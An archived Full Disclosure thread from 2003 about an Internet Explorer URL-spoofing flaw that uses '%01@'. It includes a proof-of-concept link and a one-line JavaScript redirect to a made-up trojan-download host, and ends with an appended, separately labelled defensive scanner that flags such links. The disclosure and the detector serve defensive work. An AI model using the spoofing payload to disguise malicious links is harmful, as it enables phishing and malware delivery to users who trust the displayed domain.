Full Disclosure mailing list archives
Re: RE: FWD: Internet Explorer URL parsing vulnerability
From: "Clint Bodungen" <clint () secureconsulting com>
Date: Tue, 9 Dec 2003 13:08:20 -0600
I don't really think it will make that much of a difference to their profits considering anyone dumb enough to fall for those scams isn't going to know the difference between an IP address in the URL box and a "spoofed" domain. I had a client fall for an eBay scam and the end resulting domain in the URL box was damn near www.robbingyoublinddamngringo.com.

I can see where a more effective scam would be, like you hinted at, the infamous Microsoft security update emails.

----- Original Message -----
From: "S G Masood" <sgmasood () yahoo com>
To: <full-disclosure () lists netsys com>
Sent: Tuesday, December 09, 2003 12:22 PM
Subject: [Full-disclosure] RE: FWD: Internet Explorer URL parsing vulnerability
LOL. This is so simple and dangerous, it almost made me laugh and cry at the same time. Most of you will realise why...;D The Paypal, AOL, Visa, Mastercard, et al email scammers will have a harvest of gold this month with lots of zombies falling for this simple technique.

# POC ##########
http://www.zapthedingbat.com/security/ex01/vun1.htm

Don't be surprised if your latest download from http://www.microsoft.com turns out to be a trojan!

location.href=unescape('http://windowsupdate.microsoft.com%01@comedownloadaneviltrojanfromme.com');

--
S.G.Masood
Hyderabad, India

PS: One more thing - no scripting required to exploit this.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
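Added example, not part of either post: a mail-filter style check for the link shape shown in the PoC, where the text before "@" in the authority is userinfo and the real host follows it. The function names, reason labels and the example.test host are assumptions made for illustration.

```javascript
// Added example (not from the thread). Reports the host a link really
// points at and flags userinfo that could mask it, as in the PoC's
// "trusted.name%01@other.host" shape. example.test hosts are constructed.

function inspectLink(raw) {
  let url;
  try {
    url = new URL(raw); // WHATWG parser: splits userinfo from host
  } catch (e) {
    return { raw, host: null, reasons: ['unparseable'] };
  }
  const reasons = [];
  const userinfo = url.username + (url.password ? ':' + url.password : '');
  if (userinfo) {
    reasons.push('userinfo-present');
    let decoded = userinfo;
    try {
      decoded = decodeURIComponent(userinfo); // %01 -> U+0001
    } catch (e) {
      reasons.push('malformed-percent-encoding');
    }
    // Control characters have no legitimate use in credentials.
    if (/[\x00-\x1f\x7f]/.test(decoded)) {
      reasons.push('control-char-in-userinfo');
    }
    // Userinfo shaped like a DNS name reads as the destination to a user.
    if (/^[a-z0-9-]+(\.[a-z0-9-]+)+/i.test(decoded)) {
      reasons.push('userinfo-looks-like-hostname');
    }
  }
  return { raw, host: url.hostname, reasons };
}

// Pull http(s) links out of a message body and keep only flagged ones.
function scanBody(text) {
  const links = text.match(/https?:\/\/[^\s"'<>]+/gi) || [];
  return links.map(inspectLink).filter((r) => r.reasons.length > 0);
}

// Constructed sample body: one masked link, one ordinary link whose
// query string happens to contain '@'.
const SAMPLE_BODY =
  'Install the update: ' +
  'http://windowsupdate.microsoft.com%01@downloads.example.test/patch.exe ' +
  'or read https://www.example.test/help?mail=a@b';

console.log(JSON.stringify(scanBody(SAMPLE_BODY), null, 2));
```
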